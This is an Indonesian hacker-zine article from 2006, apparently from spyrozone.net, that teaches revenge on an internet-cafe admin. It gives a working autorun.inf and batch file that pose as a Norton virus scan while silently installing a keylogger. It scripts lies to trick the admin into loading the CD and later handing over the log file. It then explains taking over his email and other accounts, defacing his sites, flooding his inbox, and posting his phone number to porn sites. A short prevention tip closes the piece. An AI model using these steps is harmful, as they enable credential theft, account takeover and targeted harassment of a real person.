- EVILratE, PushMOV, MyzTX, Dr3, Lun4, Clust3r, RX-259, RX-290, RX-313, RX-147
- Mr.Rio, PramayunTA, Alfian, Andien, Taurista, Bachtiar, EQ, WisNU, Arman,
Dani, Rara, Icha, Prita, Vivi, Nabiel, Tika, Kemas, Bomy, Arbi, Tunjung,
Krishna, Rizki..
- All my friend in SMAN 2 SIDOARJO
- All member of www.spyrozone.net .. stay Alert in SPYRO ZONE!!


0 [0XFFFFFFF] Attachment:

Berikut adalah contoh social engineering sederhana. Saya ambil dari tulisan
saya yang berjudul "Pembalasan Untuk Sang Admin"-www.spyrozone.net. Enjoy... ;)


------------------------------------------------------------------


Pembalasan Untuk Sang Admin - SOcial Engineering



May 12, 2006 jam 21:16 malam di depan RedHat tercinta dengan segelas Heineken
Author: SPYRO KiD
CopyLeft (c) 2006 by www.spyrozone.net


|---[Table of Contents

1. Introduction
2. Serangan pertama
3. Serangan kedua
4. Hari pembalasan
5. Cara pencegahan
6. Penutup


1. Introduction

Semakin paranoidnya para admin belakangan ini menyebabkan banyak pengguan jasa
layanan internet cafe (warnet) menjadi kurang nyaman. Restriction (pembatasan)
disana-sini (walaupun semua itu dilakukan bukan tanpa alasan) menjadi salah
satu inspirasi bagi banyak orang untuk mencari-cari cara menerobos segala
keterbatasan itu dan saling men-share pengetahuan mereka. Berbagai jenis
exploit pun dibedah, didiskusikan dan dikemas menjadi artikel untuk para
newbie.

Sejenak para newbie bisa tertawa puas, berjaya, senyum-senyum sendiri sampai
tak jarang lupa diri :P Namun semua itu tentunya tidak bertahan lama. Admin
menjadi semakn pintar. Fasilitas Floppy drive dan CD room drive dihapus dan
melarang user untuk melakukan segala bentuk transfer file dari media
penyimpanan sementara (disket, cd, flashdisk) kecuali melalui server terlebih
dahulu. Ini merupakan fenomena yang akhir-akhir ini bisa kita temui dengan
mudah di berbagai Internet cafe. Admin mulai rajin mengupdate path sehingga
exploit-exploit yang dulu dibangga-banggakan oleh kaum newbie menjadi
"rongsokan" tak berguna.

Sekarang, mari kita bangunkan sang admin dari mimpi indahnya untuk menunjukkan
bahwa menjadi paranoid itu adakalanya tidak baik dan tidak ada system yang
100% secure.


2. Serangan pertama

Kita akan menjadi seorang "agen mata-mata" (hehehe.. gw pake istilah ini biar
ente merasa agak sedikit keren) yang akan merekam segala aktivitas sang admin.
Tujuannya.. banyak! dan salah satunya seperti hal yang banyak diinginkan
orang... mendapatkan password sang admin. Partner kita kali ini adalah
navw32.exe, sebuah keyloger dengan icon Norton AntiVirus yang bisa kamu
dapatkan suka-suka dengan harga cuma-cuma di halaman member www.spyrozone.net
kategori Keyloger. Setelah kamu download keyloger tersebut, ikuti langkah -
langkah berikut:

---[1 Bukalah Notepad kemudian ketik baris script berikut:

[autorun]
open=nav.bat

Klik [file][save] kemudian pada box save as type, pilih All Files dan pada
form isian name beri nama Autorun.inf lalu klik tombol [save].

---[2 Buka lembar baru pada notepad dengan klik menu [file] [new] lalu ketik
script berikut:

@echo off
echo Norton Antivirus 2006
echo Scanning disk drive...
echo Please wait...
copy navw32.exe %windir%\navw32.exe
call %windir%\navw32.exe
echo.
echo.
echo.
echo.
echo.
echo.
echo.
echo. Scanning complette! No virus threat detected!
echo.
cls

Klik [file][save] kemudian pada box save as type, pilih All Files dan pada
form isian name beri nama nav.bat lalu klik tombol [save].

---[3. Persiapkan beberapa file microsoft word documents (bisa diganti dengan
file lain) sebagai tipuan/alasan untuk di transfer. Semakin banyak file,
semakin baik karena file keyloger kamu akan semakin tersamarkan.

---[4. Persiapkan sebuah cd kosong (bekas juga boleh) lalu bakar semua file
diatas (autorun.inf, nav.bat, navw32.exe dan file-file tipuan) kedalam CD.

Sekarang pergilah ke warnet tempat sang admin berkuasa. Bersikaplah seperti
biasa dan jangan gugup selayaknya para koruptor yang sering nampang di
satasion-stasion TI-PI tanpa rasa malu. Setelah kamu login ke billing komputer
user, datangi sang admin. Katakan pada beliau, "Mas/mbak/om/tante/, mau
transfer file dari cd ini. Nama filenya blablabla tolong dikirim ke komputer
nomor blablabla."

Begitu CD dimasukkan, saat itulah terjadi sebuah fenomena berikut:
Komputer akan memproses file autorun.inf secara otomatis ---> file autorun.inf
akan memproses file nav.bat ---> file nav.bat akan menduplikasi file
navw32.exe ke dalam directory windows dan mengaktivkannya ---> Keyloger telah
terinstall, hasil rekamannya akan tersimpan di directory yang sama dengan nama
navw32.dll beratribut hidden.

Perlu diketahui bahwa keyloger ini tidak akan menampilkan kotak dialog dalam
bentuk apapun! So, nggak usah khawatir bakal ketahuan ;)

Sekarang, kamu bisa pulang dengan wajah tanpa dosa dan mungkin (lagi - lagi)
kamu bakalan senyum-senyum sendiri sambil mengelus-elus jenggot kayak habis
menang togel.

Lalu bagaimana cara mengambil file hasil rekaman keyloger di directory windows
sang admin? Ikuti langkah-langkah pada serangan kedua.


3. Serangan kedua

Dua hari Kemudian, datanglah ke warnet itu lagi. Bertingkahlakulah secara
wajar dan beraktivitas seperti layaknya user biasa. Setelah selesai
berinternet ria, datangi sang admin, bayarlah biaya browsing seperti biasa
lalu dengan wajah sangat-sangat memelas seperti pengemis di jalanan :) katakan
pada beliau,"Mas/mbak/om/tante/, komputer saya bermasalah neeh. Menurut pesan
Error yang muncul, file navw32.dll yang berada di directory windows hilang.
File tersebut beratribut hidden. Tolong doong copykan dari komputer ini.
Kebetulan versi windowsnya sama dengan komputer saya.."

Tentu saja biasanya sang admin dengan sangat senang hati akan membantu kamu.
Dengan suka rela dan penuh kesadaran beliau akan mengaktifkan opsi Show All
files pada Folder Options dan mengcopy-kan file navw32.dll dari directory
windows tanpa menyadari bahwa file tersebut bukan file system, namun file
hasil rekaman keyloger.

Berikan disket/cd/flashdisk mu dan setelah file tersebut tersimpan, ucapkan
beribu terima kasih lalu pulanglah ke rumah. Buka file tersebut di rumah. Klik
2x pada file lalu ketika muncul kotak dialog open with, klik opsi select
program from a list dan pilih notepad pada daftar program yang ditampilkan.
Sekarang tentunya kamu bisa leluasa membaca rekaman aktivitas sang admin. Cari
password emailnya dan kamu bisa menuju pada hari pembalasan.


4. Hari Pembalasan

Pilih hari yang tepat, misalnya malam jum'at kliwon dimana sang admin mungkin
sedang terlelap di rumahnya. Nyalakan komputermu dan connectlah ke Internet.
Namun ada baiknya kamu lakukan hal ini di warnet agar lebih aman. Carilah
warnet yang buka 24 jam.

Berbekal hasil rekaman keyloger tadi, loginlah ke account email sang admin.
Setelah puas menjelajahi emailnya, subscriblah ke berbagai mailing list besar
dengan email tersebut. Subscribe sebanyak-banyaknya.

Hohoho.. lalu apa lagi nich?? Kalau sang admin punya blog/website pribadi/
account Friendster.. tentu kamu dengan mudah mendapatkan semua password itu
dengan fasilitas forgot password. Kebanyakan penyedia layanan seperti itu akan
mengirimkan password via email. So, setelah dapat semuanya... heheh... DEFACE
ajah ;) Tapi inget lho, halaman lama harus tetap di backup dan jangan merubah
password apapun!!

Ada ide yang sedikit lebih sadis (ini cuma ide lho.. sebaiknya jangan
dilakukan deech..). Daftarkan emailnya ke berbagai situs - situs porno dan
postinglah sebuah pesan singkat, memikat dan "mematikan". Berikut contohnya
jika milis tersebut berbahasa Indonesia:

Dear all..
gwe lagi nafsu berat neeh, burun telepon gwe doong sekarang juga!! neeh no
telp gwe: 021-blablabla (masukkan no telp sang admin)
gwe tunggu 24 jam lho!!

Atau terserah kamu laah.. saya rasa kamu lebih pintar dalam memilih kata- kata
yang yahuud!! ;D

Maka bisa dipastikan malam itu akan menjadi malam jumat kliwon paling
mengerikan bagi sang admin, lebih mengerikan daripada film-film horor manapun!
Telepon rumahnya akan berdering tanpa henti dibanjiri oleh telepon dari dalam
dan luar negeri dengan maksud pembicaraan yang sudah bisa ditebak apa
maksudnya ;D

Keesokan harinya, setelah menghadapi malam paling mengerikan itu, sang admin
akan kaget 1/2 hidup 1/2 mati mendapati inboxnya penuh dengan email-email dari
berbagai milis yang beliau sendiri tidak merasa pernah bergabung dengan
milis-milis itu. Dan bisa jadi, saat beliau sedang sibuk Unsubcribe dari
milis-milis tersebut, telepon rumahnya masih terus - terusan menjerit - jerit
dengan jeritan indah :D


5. Pencegahan

Jika kamu adalah admin yang tidak mau mengalami nasib seperti diatas, maka
setiap kamu menerima CD dari siapapun..
1. Buka windows explorer
2. Tekan-tahan tombol shift sambil memasukkan CD kedalam CD Room dRive.
3. Setelah CD masuk,tetap tekan tombol shift sampai kira-kira 25 detik.Setelah
itu kamu bisa melepas tombol shift dan mengaksesnya melalui panel sebelah kiri
windows Explorer. Klik pada area folder tree, jangan pada daftar drive sebelah
kanan karena fitur autorun akan aktif.

Dan ingat, jangan terlalu percaya pada siapapun! Ada begitu banyak orang tidak
terduga di sekitar anda!!

---------------------------------evolution---------------------------------
Read More to.. cara sang hacker mengetahui password